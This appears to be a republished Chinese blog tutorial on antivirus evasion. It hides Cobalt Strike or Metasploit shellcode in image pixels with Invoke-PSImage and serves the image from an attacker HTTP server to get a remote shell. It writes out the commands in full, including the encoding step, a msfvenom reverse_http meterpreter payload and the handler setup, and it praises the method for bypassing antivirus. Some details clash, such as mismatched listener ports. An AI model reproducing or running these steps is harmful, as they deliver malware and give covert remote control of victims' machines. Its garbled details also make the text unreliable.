博客
关于我
shellcode隐写到像素RGB免杀上线到CS
阅读量:443 次
发布时间:2019-03-06

本文共 1601 字,大约阅读时间需要 5 分钟。

利用图片像素RGB隐藏Shellcode实现免杀免杀上线(CS与MSF双平台)


前言

最近跟一个朋友一起开发一个站点时,发现站点开了很多杀软,包括各种CSPowershell马和反调试工具,使用传统的CS反调试方法无法成功上线。后来在GitHub上找到了一种将Shellcode隐藏到图片RGB像素的方法,并成功将其上线到CS平台。这个免杀方法效果非常好,且实现相对简单。今天将详细记录这个免杀过程。


本地环境

靶机:Win7

IP:192.168.82.136
攻击机:FSEC
IP:192.168.82.134


步骤

CS平台使用步骤

  • 生成PowerShell脚本

    首先,在CS上生成一个PowerShell脚本文件。可以使用以下命令:

    Set-ExecutionPolicy Unrestricted -Scope CurrentUserImport-Module .\Invoke-PSImage.ps1Invoke-PSImage -Script .\payload.ps1 -Image .\shell.jpg -Out .\shell.png -Web
  • 生成带有Shellcode的图片

    执行上述命令后,会生成一张名为shell.png的图片文件。这个图片文件的每个像素都被修改为特定的RGB值,隐藏了Shellcode。

  • 架设HTTP服务器

    使用Python架设一个简单的HTTP服务器,用于提供隐藏Shellcode的图片。命令如下:

    python3 -m http.server 80
  • 在靶机上运行PowerShell

    将生成的shell.png文件中的URL替换为攻击机的HTTP地址(如http://192.168.82.134/shell.png),然后在靶机上运行PowerShell脚本。Shellcode会通过图片被传递到靶机,并执行相应的攻击代码。


  • MSF平台使用步骤

  • 生成PowerShell反向HTTP支付拉伸(RAT)

    使用Metasploit Framework(MSF)生成一个RATPayload:

    msfvenom -p windows/x64/meterpreter/reverse_http LHOST=192.168.82.134 LPORT=7788 -f psh-reflection > msf.ps1
  • 将Shellcode隐藏到图片中

    将生成的msf.ps1文件与Invoke-PSImage.ps1文件放在同一目录,按照CS平台步骤生成一个带有Shellcode的图片(如msf.png)。

  • 在MSF中设置反向监听

    在攻击机上使用MSF设置一个反向HTTP监听:

    msf6 > use exploit/multi/handlermsf6 > set payload windows/x64/meterpreter/reverse_httpmsf6 > set lhost 192.168.82.134msf6 > set lport 7799msf6 > exploit
  • 在靶机上运行PowerShell

    将生成的msf.png文件中的URL替换为攻击机的HTTP地址(如http://192.168.82.134:7799/msf.png),然后在靶机上运行PowerShell脚本。Shellcode会通过图片被传递到靶机,并执行远程攻击。


  • 结尾

    这种将Shellcode隐藏到图片RGB像素的免杀方法非常实用,既能绕过杀软检测,又能轻松实现远程控制。无论是CS平台还是Metasploit平台,都可以通过简单的命令完成整个流程。对于对技术感兴趣的朋友来说,这是一个非常值得尝试的方法。


    免责声明

    本文仅用于技术交流和学习,严禁将介绍的方法用于非法操作。如果您对他人造成损失,请自行承担后果。如果您无法接受上述约定,请不要阅读本文。

    转载地址:http://reakz.baihongyu.com/

    你可能感兴趣的文章
    pnpm : 无法加载文件...
    查看>>
    pnpm 如何安装指定版本
    查看>>
    pnpm的设计与npm的对比
    查看>>
    PO VO DTO BO区别及用法
    查看>>
    pocoserver无限重启_Poco::TCPServer框架解析
    查看>>
    POCO库中文编程参考指南(4)Poco::Net::IPAddress
    查看>>
    Quartz基本使用(二)
    查看>>
    POC项目安装与使用指南
    查看>>
    Podman核心技术详解
    查看>>
    pods 终端安装 第三方框架的一些命令
    查看>>
    Podzielno
    查看>>
    PoE、PoE+、PoE++ 三款交换机如何选择?一文带你了解
    查看>>
    PoE三种标准:标准 PoE、PoE+、PoE++,网络工程师必知!
    查看>>
    POI 的使用
    查看>>
    poi 读取单元格为null者空字符串
    查看>>
    poi-tl简介与文本/表格和图片渲染
    查看>>
    pointnet分割自己的点云数据_PointNet解析
    查看>>
    POI实现Excel导入Cannot get a text value from a numeric cell
    查看>>
    POI实现Excel导入时提示NoSuchMethodError: org.apache.poi.util.POILogger.log
    查看>>
    POI实现Excel导出时常用方法说明
    查看>>